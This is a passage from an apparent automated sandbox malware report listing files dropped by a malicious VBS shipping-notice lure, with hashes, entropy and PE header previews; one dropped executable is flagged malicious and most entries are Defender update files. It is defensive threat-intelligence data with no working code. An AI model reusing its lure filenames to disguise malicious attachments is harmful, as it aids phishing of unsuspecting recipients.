C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll	1gPmnCR2PX.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90114
Entropy (8bit):	6.176120840793422
Encrypted:	false
SSDEEP:	1536:QhVs0kRE/a2WXJ633x4Cx1Kq/Vd1PhhyI8jstoidUr:QjAGtc63XvK8d1Pz5Sr
MD5:	C7778BEEB7B4EE95495E9268EB7DC6A2
SHA1:	1BB4978F7A7AFAFFDDA28465D883157A83487E23
SHA-256:	9AAE447ECF7C9B42058153993D02DCC0EF2D92984A0987CF543E6E132740E2EA
SHA-512:	CE2FB8E246AB977726D19B4562A5502FBC8A8E4038FFA6FA15D02FDEDFA6FDB3D780648058478CA532865444D7441764840DB98867662CF27102A946701AFCCC
Malicious:	true
Joe Sandbox View:	Filename: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L......W................. ...P...............0....@.................................)%......................................d...(....`..z...................................................................(... .......(............................text...L........ .................. ..`.data...x ...0.......0..............@....rsrc...z....`... ...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FLGEBREV\COCKFIGHT.exe Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	data
Category:	dropped
Size (bytes):	90115
Entropy (8bit):	6.176073293832656
Encrypted:	false
SSDEEP:	1536:dhVs0kRE/a2WXJ633x4Cx1Kq/Vd1PhhyI8jstoidU8:djAGtc63XvK8d1Pz5S8
MD5:	A9E34DD27467F3753981EE787008C8E5
SHA1:	1DD7E4C80FBCDED234C56EE3A361EAAC70993C31
SHA-256:	64DA0B21E1BBB342F9817C7FD3B1C9E31A25D699429B1494E22B6FBC10F149EE
SHA-512:	2E6E9627C79844C6217571BB8B4227A06D0396A83F6DCE06C2CCA87FB627BA2B1BC41228365F8A077619614E6E68B8A35CF992B7742927C64CA9496B50D13527
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L......W................. ...P...............0....@.................................)%......................................d...(....`..z...................................................................(... .......(............................text...L........ .................. ..`.data...x ...0.......0..............@....rsrc...z....`... ...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	454904
Entropy (8bit):	6.2829164628823575
Encrypted:	false
SSDEEP:	6144:p+BaOdQrqYpWVCPpYXe14f6eFL+TFFzE/tzkY5WwuTWOahE:kQ2YpWkPiXe14f6eFL6FA/zWwgChE
MD5:	065E4E5BE96865266D1FC4449274CE20
SHA1:	C6FF45B448F7B828D8C6369B5DE95B41E685F502
SHA-256:	98E3951BA9FACFB2B878D98D237D63C675878A09D9B6E18640C96746B6665041
SHA-512:	E63A5CF20678757F3FA277C56576F0DFBFF41DCBE61BEEFF28C608EE5D2BE2766E16A93E2FC423E6697670AC7E164E2B29EE5755AADAAE1C58B6F6F3FE1A6481
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1gPmnCR2PX.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............._..._..._...^..._..x_..._K..^..._K..^..._K..^N.._K..^..._..._..._...^..._..._..._...^..._Rich..._........................PE..d......m.........."..........P.......u.........@.....................................]....`.......... ...................................................#...p...9....... ...... ...8f..p...................8...(.......8...........`...8............................text............................... ..`.rdata...u..........................@..@.data...PD... ...0... ..............@....pdata...9...p...@...P..............@..@.rsrc....#.......0..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	303352
Entropy (8bit):	6.103843753653899
Encrypted:	false
SSDEEP:	6144:6CFCIAsyTqaF2uNoLQ7iF5K8+v5y8hCs2Y:6ypfyTqIL6LQ7iF5K8+484BY
MD5:	8C7A45FC0FDFB95104C84A68EAFBD170
SHA1:	D770064F1956FF05248E4C56DCF511928A7D8C3F
SHA-256:	B0A45EEB123840F105A40DB938553801C54DC5EED5FD2F710AC7EA24E16D0B56
SHA-512:	CD0B5A72D12B513B9EE160C1A18275893480488378A0E8E241600F0DCB1275B1F3CDC3C0096345D9A2B942C800484DC0E5210E0C4B409D5FE69B94716CE432FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1gPmnCR2PX.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q[.'5:}t5:}t5:}t.O\|u7:}t.O~u4:}t<B.t1:}t.H\|u,:}t5:\|tM;}t.Hyu(:}t.H~u;:}t.Hxu.:}t.O}u4:}t.Otuy:}t.O.t4:}t.O.u4:}tRich5:}t........................PE..d...c..P.........." ......................................................................`A........................................0...p............p.......@..`$....... ......8.......p...................h@..(...0?..8............@...............................text...L........................... ..`.rdata..............................@..@.data....-....... ..................@....pdata..`$...@...0...0..............@..@.rsrc........p.......`..............@..@.reloc..8............p..............@..B................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48520
Entropy (8bit):	6.2073261328907865
Encrypted:	false
SSDEEP:	768:0WfrO9dZBf9slBe+eRPKUjKHWPkKrdtBGgz:1ybZMrCKUjKulLBH
MD5:	1BF7CF2DBA97C71FF1876F0DE67421C3
SHA1:	48DFEC30B75138FCAF5DFFE16CB9822BA4CC4178
SHA-256:	B946398AB34EF5BF16DC3461D32261664760C0F86E8A281BCD90361A170E27FD
SHA-512:	11E1E1C339F9BFFC83919946ACFA6F3D5CC1C7494A21629332004E2445AAE919A0E014366DFDCE7764C934E1F7C2C0CABAAFF0179C8A145DBB0759BAE218F540
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kM.W/,../,../,../,...,...^..*,...^..,,...^..=,...^..),...Y..$,...Y}..,...Y...,..Rich/,..........PE..d...9............."......d...4...........................................................`A.................................................q..<.......`....`...........!......@....8..p...........................@0..8............p..`............................text............ .................. ..h.rdata..0....0.......$..............@..H.data........P.......8..............@....pdata.......`.......<..............@..H.idata.......p.......@..............@..HPAGE...../.......0...H.............. ..`INIT.................x.............. ..bGFIDS...$...........................@..B.rsrc...`...........................@..B.reloc..............................@..B................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164072
Entropy (8bit):	6.14800914066086
Encrypted:	false
SSDEEP:	3072:A1y1RnaePd+RhtbV0vgn8wNgaZp8kdiQfH4M4mD:3naePkRhtbV0vrwNgaZp8G7fYe
MD5:	26B890C2237E48DAF8B9B901EBE7A0C1
SHA1:	08976CF446255E9BB538B8540BBE0DD4BF3E8A65
SHA-256:	B1D793E12DBF2CE5197960454F0A5AE6C93703FA5BF2D7622EC0FDFBAC183211
SHA-512:	F580903A15E67888F714CA073D4B56C349131D2C03769092794656E538E0501CCAAC4B563311346B22AD8F81302FE2FBE22F4F6B1BD352BC4213EAED7F7F25D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.i. ... ... .......#... ..........'...............%...............!.......!...Rich ...........................PE..d...l:..........."..................X.....................................................A....................................................P....p...............`... ..............p...........................Pb..8............................................text...*O.......P.................. ..h.rdata...Y...`...\...T..............@..H.data...............................@....pdata..............................@..H.idata........... ..................@..HPAGE....!).......,.................. ..`INIT.....)...0...,.................. ..bGFIDS........`.......@..............@..B.rsrc........p.......D..............@..B.reloc...............L..............@..B................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	434424
Entropy (8bit):	6.350342003442293
Encrypted:	false
SSDEEP:	6144:EF/vuF3th9Gf4GYapoQm1RGpIk6IjKtGnpPVzcZYac3UA2dwcSogCYog:EYFdhQgGYNPR8Iv1gpP+2oG
MD5:	B6C6FFC05B52D2F8A433DD12C3A11D30
SHA1:	F221740A99726722E5F5DF8CC3A0182436060A46
SHA-256:	666259E830F5EAC0707B2D957944B7468FA645271C60B8EA54E5130B8336D1F6
SHA-512:	1B0ABBB15A3018B584B0239C04A94E38FE433D382771BF8CFFAECC5B8776AC87DBC4278B4D2E0A341026F3B9FF43B84F604A52797D134E2C3881ADF03C9358F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Qm.0..kc..kc..kc..jc..kc.~jb..kc.~nb..kc.~ob..kc.~hb..kc.ycb-.kc.y.c..kc.yib..kcRich..kc................PE..d....5............"......L...4.......H..............................................=......A...................................................P....p.......`..4#....... ...........!..p...........................P...8............................................text............................... ..h.rdata..H}..........................@..H.data...d....P.......D..............@....pdata..4#...`...$...L..............@..H.idata...,.......0...p..............@..HPAGE.....-.......0.................. ..`INIT.....[.......\.................. ..bINIT.........P.......,..............@...GFIDS...<....`.......4..............@..B.rsrc........p.......8..............@..B.reloc...........0...P..............@..B................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	86264
Entropy (8bit):	6.087010539108971
Encrypted:	false
SSDEEP:	1536:xFbk8rfBGjiGUQiQ5Df0uEWWH1shZJ+Rb7NvmoHPNr:xFbprZGuzQnjR81shW5JvmCFr
MD5:	9C4361259D5F0D7A36A10BD28D000F90
SHA1:	F1CB41DB2356666AD123686B0AD52A2112D91474
SHA-256:	7445476DE9BAB0D9C975DBDF63BD928D7E3139DF3FC69463BF08897E3B087575
SHA-512:	55863A0B999439CD0C1747A81BD34991D81C631571797CC6F6335B60F1D054EB31951418DAF5587ADC43F65F16711482FBC82D0F0C9495CFBA834919FDBF9264
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U..U..U.....Q..U..,.....R.....E.....S....Z...%.T....T..RichU..................PE..d....%.........."..........\.......`....................................................`A................................................h...P....................0... ......H...X...p...............................8...............@............................text...*........................... ..h.rdata..p .......$..................@..H.data...(...........................@....pdata..............................@..H.idata..............................@..HPAGE....H ...0...$.................. ..`INIT.........`...................... ..bGFIDS........p......................@..B.rsrc...............................@..B.reloc...............$..............@..B........................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-AMFilter.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12624
Entropy (8bit):	5.259327730394375
Encrypted:	false
SSDEEP:	192:/5mm9AfGjUa1rIL+FUVin2F/OZDfYj5YbAxqTSSS6S8SzSySovK1ZVuB:/5mm9AfGtML+Fws2Fo7m5YcxHKrVo
MD5:	B6D65A86FC1999A62DA10EA3C4CAD3E4
SHA1:	E79E97C04D8540A2005D21021F7781676E705BCD
SHA-256:	05B2BFD40FB3A344C3AE178C420A7FEA9595815CB1CC07843078112F5F551EAF
SHA-512:	7F13B4930F9BF9ABCFD64E905DA4F0111B34197A533FB0162E43C4C80F39D135ADAA09C3E7AF3E95397BEF5D1D323E75721CEE150517CB13EBED3029C781BEC6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Drivers" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>... .. *********************************************************************************************************.. Driver files.. *********************************************************************************************************.. -->...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdFilter.sys" sourceName="WdFilter.sys" sourcePath=".\"></file>...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdBoot.sys" sourceName="WdBoot.sys" sou

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-NIS.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6173
Entropy (8bit):	5.373156847974759
Encrypted:	false
SSDEEP:	96:/3coK5HjFWr/96Hj+Uul2lewqo3nRtlUl3lflxSDwMKRbRhK18YaKMr4e:/mDFcujBuEgI3nzC1Z6V8f3
MD5:	5562965C32F03AE0DF8B9DEF950F8651
SHA1:	6E5AD734AB6A9F8B82B19024E21007AC2CAD2540
SHA-256:	EA64BE59286B67AE930729FA92B2B08DCE5C2EAEB70FEABE2320C47FB6DDAC6C
SHA-512:	F64D728AFE40800968D0B165019E775F62F2CCA40BFBB370F52F4BA8FCC2574F79D2C4AC41CCAE6E1CEC23082BA24B5E6C0A5531E6B336683BEEEDDA3CB81CDE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-NisSrvEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{102aab0a-9d9c-4887-a860-55de33b96595}" message="$(string.Microsoft-Antimalware-NIS.provider.name)" messageFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" name="Microsoft-Antimalware-NIS" resourceFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" symbol="Microsoft_Antimalware_NIS">......<tasks>.......<task eventGUID="{b33e041e-3a75-4f52-bf0e-c85d0963b7fb}" name="N

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-Protection.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3369
Entropy (8bit):	5.312049604455802
Encrypted:	false
SSDEEP:	96:/3poK58yFND08uf9zXzUzCzwat0kz9nHHzyPYjHMrje:/FbFHuf9DzUOVJ1HHePv2
MD5:	E4AD891E7B62475FCA109C0DF4DEF16E
SHA1:	B7DC3C04C67D7903E04B0EBF2AB7840AAA717EE0
SHA-256:	DF9AD93CDB61587A35FCDCE996955A64413439A474D85C86133A9E9C185D1966
SHA-512:	0849CB6F3DAA6C80B94F770E29BD389B67D31E089595B22BFAF1D6F25C6E847DA4DCBFF135F6D96E30597991FF6C8CA8EB5306C4E8D1B334016220058B2969E1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpClientEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{e4b70372-261f-4c54-8fa6-a5a7914d73da}" message="$(string.Microsoft-Antimalware-Protection.provider.name)" messageFileName="%programfiles%\Windows Defender\MpClient.dll" name="Microsoft-Antimalware-Protection" resourceFileName="%programfiles%\Windows Defender\MpClient.dll" symbol="Microsoft_Antimalware_Protection">......<tasks>.......<task eventGUID="{7db81ddd-d2be-41bd-

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-RTP.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12885
Entropy (8bit):	5.3652290431980765
Encrypted:	false
SSDEEP:	192:/ozFIItP1HvYoPp5z7YlAZSJwyygPJ2HBfEj:/QFIwP1PYoh5WAZSJwsJ2NC
MD5:	35AC30A8637BC0EB2F7902B8C69BF904
SHA1:	DB4C458A6007F444AECF8F4C49E481CC9935B22C
SHA-256:	FE761134076253DC11CF8C154CA43E762C61C28D0A817E76351FFEF32CCF59C0
SHA-512:	E41E522BF542D3B662D741E04523D1140C66585B64E811F6CD27C74466156F2FB728890C73579D4CFAD0BF8758D4F699A79C5B0B4B98479D60D386ACC26A8C49
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpRtpEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{8e92deef-5e17-413b-b927-59b2f06a3cfc}" message="$(string.Microsoft-Antimalware-RTP.provider.name)" messageFileName="%programfiles%\Windows Defender\MpRtp.dll" name="Microsoft-Antimalware-RTP" resourceFileName="%programfiles%\Windows Defender\MpRtp.dll" symbol="Microsoft_Antimalware_RTP">......<maps>.......<valueMap name="DlpOperationType">........<map message="$(string.Ope

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Antimalware-Service.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	31904
Entropy (8bit):	5.2624632476710405
Encrypted:	false
SSDEEP:	384:/VFriW4cboWcauSi6fZeeCifUhwqh+46AJJCZvsp33icjEtFBR2EaXU1Hgb1RVxq:tFriHcblBLuJ1ycgtR6XNxB4
MD5:	B003B1DFFD9221745ED31E2979B28574
SHA1:	FBCEB9767657E596CEA5E29EBDA57207F5B08A5D
SHA-256:	5AE7493F638252D49F18B084D7CEA4E88D3AF6B1170C8C16EABF5C6AE849E3C9
SHA-512:	B731F60AC20548A54C465BFC3B20334946A384895C8AA4DF4C1DA969FB71F4B7C1BEC50044C4C5A9555B68B68C8A96EC45AE78FC5EBCD406102AE144A737FF02
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpSvcEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:ms="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{751ef305-6c6e-4fed-b847-02ef79d26aef}" message="$(string.Microsoft-Antimalware-Service.provider.name)" messageFileName="%programfiles%\Windows Defender\MpSvc.dll" name="Microsoft-Antimalware-Service" resourceFileName="%programfiles%\Windows Defender\MpSvc.dll" symbol="Microsoft_Antimalware_Service">......

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Microsoft-Windows-Windows Defender.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	149152
Entropy (8bit):	5.478121035794876
Encrypted:	false
SSDEEP:	1536:5oQofFA+1KSYfSN8bvc0/E/EvJ4rXVEc+ICO+PV5FqGc9HCOKK1HVX:SBfErIHKK1HVX
MD5:	36F8A68EECFB5B89C4C571F6A63E3ECA
SHA1:	242DC76813FE0BE2E676D37538FD887292803E68
SHA-256:	4D76246642181E38F87B623AF82BF7454050D05775F546506CFACA1608BE9633
SHA-512:	C483FCE988F96156FAAACA093F1CE948B0CC42C006012F6F29308F4ED09D295951F59C79A547341578616E58561CAF858135881AF305B3166E1D4474B48D35C8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Events" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<dependency discoverable="false" optional="false" resourceType="Resources">....<dependentAssembly>.....<assemblyIdentity buildType="release" language="" name="Windows-Defender-Events.Resources" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384"></assemblyIdentity>....</dependentAssembly>...</dependency>... .. ********************************************************************************************************.. BEGIN FILES SECTION .. *********************************************************************************************************.. --

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAsDesc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	209144
Entropy (8bit):	5.205036912846813
Encrypted:	false
SSDEEP:	6144:PmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJL:tr
MD5:	A27F0ABF90F3B468C6F15CDAFBBC3312
SHA1:	D75B9FD570E9650F583F15F0F0F37EB2CBC39EC4
SHA-256:	503DF4EF842D6621139D4A15D68955E4926C0C6B5CCCEF60323290A6FC08343F
SHA-512:	9716144577A19591E12BB10732FF135D00928D1C5951AB220057A4A00D42B74E8980825D6DD60A8486EE1EC75CBAEA7C5525D4F4E600F5F869BEABA53C7D5FE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d....z..........." ......................................................................`A......................................................... ................... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAzSubmit.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1409272
Entropy (8bit):	6.2399898718653075
Encrypted:	false
SSDEEP:	24576:5k4dJL+FQJApr2tz1+lC2zxw6y2os4OXB7vcHFzqh7OcI:5k4dJK+Jur2tz1+lC2VO2osDy
MD5:	C10F256B7606EE5B1BED880020F68912
SHA1:	76B51FDD50A3EEBD4B55D97E3C9A8B8C79EDF978
SHA-256:	C649EC99F87F684D22157755E5F8E0AF7C1EFD54853493965A673A3F0FFB4AC6
SHA-512:	A5A9C4190A831D1FE2EADD1AB9FE97A0BE39FE4EE97A0F223D0AC42E80C72FA2B77AA0D2F929A3B2F10E7AB4E850BC7DF1DE420CAFD7289C08C763D951D997CB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........`J.v3J.v3J.v3..u2K.v3..w2Y.v3J.w3u.v3..u2Y.v3..r2a.v3..s2..v3..3H.v3..v2K.v3...2.v3..3K.v3..t2K.v3RichJ.v3................PE..d................" .....P... .................f....................................r4....`A........................................`b.......c.......@.......@.......`... ...P...,..\|k..p.......................(.......8............................................text...HO.......P.................. ..`.rdata..$....`... ...`..............@..@.data...8...........................@....pdata.......@....... ..............@..@.rsrc........@....... ..............@..@.reloc...,...P...0...0..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpClient.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1151224
Entropy (8bit):	6.1798062394748685
Encrypted:	false
SSDEEP:	24576:MLG0IKv+HzAmqQBrTPQWNRIyQhZBcfy0RkgJ:cGFu+HzAmqEQWNRIypfy0J
MD5:	FD7D2158F21085FF8E8C46829839708E
SHA1:	1749008645208E9769DD68D36124113E71923F6D
SHA-256:	DE50D8BB61B7F0BB423E4A50A6775192C4809F63C18BE9426C4AC2E127BB9DA9
SHA-512:	03707AEAF1FED4C2BDC2CA4167498C5F7C57153A47F386D9C6A7A0DF75CD5B3C54D01A42AB56B6FDBF9A10E26213A6540FDE19F5036DC8E659500F19D728AFF0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................V..........................................?.............i.....V.......V........?......V.k.....V.......Rich............PE..d...f............." .................g.........[....................................3.....`A................................................8...T....@...............p... ...P...!......p...................(o..(.......8...........Po...............................text............................... ..`.rdata...R.......`..................@..@.data...............................@....pdata..............................@..@.didat.......0....... ..............@....rsrc........@.......0..............@..@.reloc...!...P...0...@..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	884544
Entropy (8bit):	6.103389158363899
Encrypted:	false
SSDEEP:	12288:b1SQ6UqCplyaRffknhoV55jmvuN7Wk0mCBRUe:b+UbnkhoVLmvuNqBGe
MD5:	D50CBCB0B8B3282CD169E0032361D418
SHA1:	948E0431282837D2E654BFD805461967B99E63B4
